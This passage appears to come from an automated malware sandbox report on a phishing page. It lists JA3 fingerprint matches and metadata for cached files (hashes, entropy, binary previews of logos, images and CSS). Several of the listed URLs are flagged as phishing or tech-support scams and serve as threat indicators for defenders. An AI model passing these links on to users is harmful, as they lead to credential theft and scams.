	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://recouvrement-assurance.fr/LKeZL	Get hash	malicious	Unknown	Browse	152.199.24.185
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
	https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FC2educate/aEFQv26188aEFQv26188aEFQv/anVsaWUubG9uZ2lub0BjMmVkdWNhdGUuY29t	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://csactivation.carestreamdental.com/ViewSwitcher/SwitchView?mobile=True&returnUrl=https://bpy.us/moTxvQ3E4RAm3ToTxn2APa4RAchQ3E4RAD5QyD5Qm3TQ3EmD5Qz01coTxm&mc=101631	Get hash	malicious	Unknown	Browse	152.199.4.44
	http://t.co/IcNMLUH6OE	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://17apmic5.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	152.199.4.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Proposal Invitation_ Proposal is Due by the EOB May 15.eml	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	40.68.123.157 23.220.189.216
	http://wzxqi.theknittingdoula.com/ghoopuh/lopwiuiye	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 23.220.189.216
	https://nwcchicago-my.sharepoint.com/:b:/p/jpsanavaitis/EZA36vHeUQxCnJ96O418g94BWiWpCx4SyNTLHION5X1T7g?e=N00DO7	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 23.220.189.216
	https://dinamicconsultores.app.questorpublico.com.br/	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 23.220.189.216
	https://msteams.link/WK80	Get hash	malicious	Phisher	Browse	40.68.123.157 23.220.189.216
	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 23.220.189.216
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse	40.68.123.157 23.220.189.216
	Cheat Lab 2.7.2.msi	Get hash	malicious	Unknown	Browse	40.68.123.157 23.220.189.216
	https://watsonpropertyllc.formstack.com/forms/staff	Get hash	malicious	Unknown	Browse	40.68.123.157 23.220.189.216
	https://znixulyp.com/vGgw6o	Get hash	malicious	HTMLPhisher	Browse	40.68.123.157 23.220.189.216

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 360x360, components 3
Category:	downloaded
Size (bytes):	9489
Entropy (8bit):	7.832401214573246
Encrypted:	false
SSDEEP:	192:fUBzbXq8OSRZnv9i+51AGjk3kVJVUl1RJsBTycUo2THEZhpF1:fUw85v9i+5h9yaocITEZF1
MD5:	F80D441859CEB9AAEC300FC0D41FCA85
SHA1:	596C6691761E264E04745EDD4810AF343CDEF3ED
SHA-256:	48273EC7955DE6B58E1CCBE7525DEA9AD4CA5373F61EDE3042D4722D0DB7BE92
SHA-512:	BBE0FC430BE0458B8DE1E435C91CBD4B0188B7EB19C37EA3566FD3D35B32EA64C4C6CBB4A70157A17D9FDBBA3BB248CA9D5BA1A129220DD5EA4AE58E13CAF83C
Malicious:	false
Reputation:	low
URL:	"https://ih1.redbubble.net/image.3812524360.1168/raf,360x360,075,t,fafafa:ca443f4786.jpg"
Preview:	......JFIF.............tPhotoshop 3.0.8BIM.......W..Z...%G.........t.C. developerfriday - http://www.redbubble.com/people/developerfrida....C.....................................#...!....).!$%'('..+.+&.#&'&...C...........&...&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&......h.h.."........................................................................................:..N'.{v.4.9zc. .............O..h../...dyL..>.1i.=.A.hsf.i.....zVQ,/?...P........\|x...R).m=......u.ds.......t...m.....4....U.c_w.n.....V......!X.\|..hZ.....5.dG........t.....5.4L{.({M.4...@{..i..7.-.....#.t.p..&#^.,s..p.1,1.d.q,...q#........};....AAe4...@M.;..c........\|......].K...%.,.bX."..m.<..OQ.....q.7...pgW.y.E4...@M.;.".>..z.<.....ZJ.....Xc..8c....H\|..qH......Rn.S.=...DI.$D..k...1}.....+mO..n....%.1....:]...........x.C.ZEC.d.."H."%z.....E....T.M%s....G....F3...............{.......DI.$D...Po.k...........y.g......7.X.1...m.>.....u...P..(..f...,..2...7....]h.^d...V...'..x..a...xG

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	dropped
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:	6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	dropped
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	dropped
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:	6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://www.gstatic.com/recaptcha/api2/logo_48.png
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 75x75, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	1246
Entropy (8bit):	7.808846010085192
Encrypted:	false
SSDEEP:	24:MTdxpgq3k47p11dMKevQVzC4jdSLCbw8/vSU3wJqcc+Saqpt:yvRbN7dMKf/jdaCdamwJbc+m
MD5:	0B0D324D8294AB9E1C36EFACB6276980
SHA1:	B7599E4CDD88F31A4A56C610D3E86223D95BAAE0
SHA-256:	0FE6AA8A56A4B66BA0B2D23C8AF6F1F94A894E5525C5E193C7FD70EF05A7E5E6
SHA-512:	C08A4BBDB1F2ACB74FAD8B2B51CD0E3343D38959153A62FD5E98B4591548E92344131C9ABFC742B3E51FCAE5D8FE8C98032B9EB5D2039690598B0E825093436B
Malicious:	false
URL:	https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/LinkNav-Microsoft-Outlook-75x75
Preview:	RIFF....WEBPVP8 .........K.K.>Q..D......\|8....c.....n....K.#.'...s..5y....\|..{&...k....................[...._...>..r.......R..}3...g.....V.5u..V..../...~."...~.>y._...........B{..-kRW.d..=...F.......~. >Jr.pc...]..............gL.v$i.o.T..!P.....z..Go.....GE[......w..^.. ...M..].o....n.+WM.)..4.....?.\|Q3..c.u....2O.N.....`..n,$`? ......P..{.tK..TP.....e.J...X..4..J\.<...7..CU....<g6D..]%......QO.--Q#..\|.fe.&.1U...d.%m?.5...I..@.*E...k<.....,...IP.]T.O..8./...=~..X)......L....U........N.x0.<u.........x.......c._!...GdA<.....F.q..mj... ..O...5,#..".dPTO..9.....+.K2......m....Bl....K.#.>;s....8NG...l..% ...8............\|t=x........&..\|p.....~...G....?.j.Z.30v.m..a...i.N...A./-.....J.2.]zPI..j\|3).PPr!..s....Zv......#/.,z.jM..Kr3...8.H.hH......d.t...........,.!rP.ZQ...N....1.K...v.(...C.%......F-rf.FDW..m....w.....^....M.y...:..u^.. .........,.B..6!D$/.......:>.........ZD.^..l8....[&\.h....'.....#..#......`...s...<....P...Ih.......+\|

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	4.214613323368661
Encrypted:	false
SSDEEP:	24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
MD5:	F7AB697E65B83CE9870A4736085DEEEC
SHA1:	5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
SHA-256:	CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
SHA-512:	158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 360x360, components 3
Category:	dropped
Size (bytes):	9489
Entropy (8bit):	7.832401214573246
Encrypted:	false
SSDEEP:	192:fUBzbXq8OSRZnv9i+51AGjk3kVJVUl1RJsBTycUo2THEZhpF1:fUw85v9i+5h9yaocITEZF1
MD5:	F80D441859CEB9AAEC300FC0D41FCA85
SHA1:	596C6691761E264E04745EDD4810AF343CDEF3ED
SHA-256:	48273EC7955DE6B58E1CCBE7525DEA9AD4CA5373F61EDE3042D4722D0DB7BE92
SHA-512:	BBE0FC430BE0458B8DE1E435C91CBD4B0188B7EB19C37EA3566FD3D35B32EA64C4C6CBB4A70157A17D9FDBBA3BB248CA9D5BA1A129220DD5EA4AE58E13CAF83C
Malicious:	false
Preview:	......JFIF.............tPhotoshop 3.0.8BIM.......W..Z...%G.........t.C. developerfriday - http://www.redbubble.com/people/developerfrida....C.....................................#...!....).!$%'('..+.+&.#&'&...C...........&...&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&......h.h.."........................................................................................:..N'.{v.4.9zc. .............O..h../...dyL..>.1i.=.A.hsf.i.....zVQ,/?...P........\|x...R).m=......u.ds.......t...m.....4....U.c_w.n.....V......!X.\|..hZ.....5.dG........t.....5.4L{.({M.4...@{..i..7.-.....#.t.p..&#^.,s..p.1,1.d.q,...q#........};....AAe4...@M.;..c........\|......].K...%.,.bX."..m.<..OQ.....q.7...pgW.y.E4...@M.;.".>..z.<.....ZJ.....Xc..8c....H\|..qH......Rn.S.=...DI.$D..k...1}.....+mO..n....%.1....:]...........x.C.ZEC.d.."H."%z.....E....T.M%s....G....F3...............{.......DI.$D...Po.k...........y.g......7.X.1...m.>.....u...P..(..f...,..2...7....]h.^d...V...'..x..a...xG

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 75x75, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	7.808846010085192
Encrypted:	false
SSDEEP:	24:MTdxpgq3k47p11dMKevQVzC4jdSLCbw8/vSU3wJqcc+Saqpt:yvRbN7dMKf/jdaCdamwJbc+m
MD5:	0B0D324D8294AB9E1C36EFACB6276980
SHA1:	B7599E4CDD88F31A4A56C610D3E86223D95BAAE0
SHA-256:	0FE6AA8A56A4B66BA0B2D23C8AF6F1F94A894E5525C5E193C7FD70EF05A7E5E6
SHA-512:	C08A4BBDB1F2ACB74FAD8B2B51CD0E3343D38959153A62FD5E98B4591548E92344131C9ABFC742B3E51FCAE5D8FE8C98032B9EB5D2039690598B0E825093436B
Malicious:	false
Preview:	RIFF....WEBPVP8 .........K.K.>Q..D......\|8....c.....n....K.#.'...s..5y....\|..{&...k....................[...._...>..r.......R..}3...g.....V.5u..V..../...~."...~.>y._...........B{..-kRW.d..=...F.......~. >Jr.pc...]..............gL.v$i.o.T..!P.....z..Go.....GE[......w..^.. ...M..].o....n.+WM.)..4.....?.\|Q3..c.u....2O.N.....`..n,$`? ......P..{.tK..TP.....e.J...X..4..J\.<...7..CU....<g6D..]%......QO.--Q#..\|.fe.&.1U...d.%m?.5...I..@.*E...k<.....,...IP.]T.O..8./...=~..X)......L....U........N.x0.<u.........x.......c._!...GdA<.....F.q..mj... ..O...5,#..".dPTO..9.....+.K2......m....Bl....K.#.>;s....8NG...l..% ...8............\|t=x........&..\|p.....~...G....?.j.Z.30v.m..a...i.N...A./-.....J.2.]zPI..j\|3).PPr!..s....Zv......#/.,z.jM..Kr3...8.H.hH......d.t...........,.!rP.ZQ...N....1.K...v.(...C.%......F-rf.FDW..m....w.....^....M.y...:..u^.. .........,.B..6!D$/.......:>.........ZD.^..l8....[&\.h....'.....#..#......`...s...<....P...Ih.......+\|

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	23427
Entropy (8bit):	5.112735417225198
Encrypted:	false
SSDEEP:	384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
MD5:	BA0537E9574725096AF97C27D7E54F76
SHA1:	BD46B47D74D344F435B5805114559D45979762D5
SHA-256:	4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
SHA-512:	FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
Malicious:	false
URL:	https://www.w3schools.com/w3css/4/w3.css
Preview:	./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /.html{box-sizing:border-box},:before,:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1636
Entropy (8bit):	4.214613323368661
Encrypted:	false
SSDEEP:	24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
MD5:	F7AB697E65B83CE9870A4736085DEEEC
SHA1:	5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
SHA-256:	CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
SHA-512:	158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
Malicious:	false
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
